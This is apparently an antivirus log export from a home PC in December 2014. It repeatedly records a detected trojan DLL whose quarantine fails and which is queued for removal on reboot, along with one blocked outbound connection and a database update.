FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:34:46, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:35:21, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:35:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:35:30, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:35:38, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:35:52, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:35:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:36:06, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:36:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:37:26, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:37:54, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, IP, 88.214.193.211, 49882, Outbound, C:\Windows\explorer.exe, Detection, 06.12.2014 08:38:10, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:38:15, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:38:26, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:38:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:38:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:39:25, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:39:44, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:39:53, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:40:32, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:40:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:41:09, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:41:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:42:46, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:42:51, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:47:23, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:50:16, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:51:46, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:52:02, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:53:02, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:53:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:53:06, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:53:14, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:53:17, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:53:38, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:58:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:58:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:58:55, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:58:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:02, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:07, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:13, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:29, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:33, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:40, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 08:59:48, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:00:17, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:00:29, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:00:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:01:11, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:01:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:01:34, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:02:43, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:02:49, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:02:52, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:02:57, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:03:15, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:03:36, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:03:40, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:03:48, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:03:58, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:05:54, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:14:19, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:14:51, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:14:54, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:15:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:16:07, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:16:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:16:51, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:17:00, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:17:19, finja, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:17:24, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:17:31, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:17:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:17:43, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Detection, 06.12.2014 09:17:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [cdcfe37c4c30261066cb3ab47f824bb5] Update, 06.12.2014 09:18:00, SYSTEM, FINJA-PC, Scheduler, Malware Database, 2014.12.6.4, 2014.12.6.5, Protection, 06.12.2014 09:18:00, SYSTEM, FINJA-PC, Protection, Refresh, Starting, Protection, 06.12.2014 09:18:00, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopping, Protection, 06.12.2014 09:18:02, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopped, Protection, 06.12.2014 09:19:29, SYSTEM, FINJA-PC, Protection, Refresh, Success, Protection, 06.12.2014 09:19:29, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Starting, Protection, 06.12.2014 09:19:34, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Started, Detection, 06.12.2014 09:19:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:19:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:19:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:20:42, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:20:47, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:20:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:20:56, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:21:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:21:07, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:21:44, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:21:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:22:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:22:21, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:22:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc] Detection, 06.12.2014 09:23:20, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, 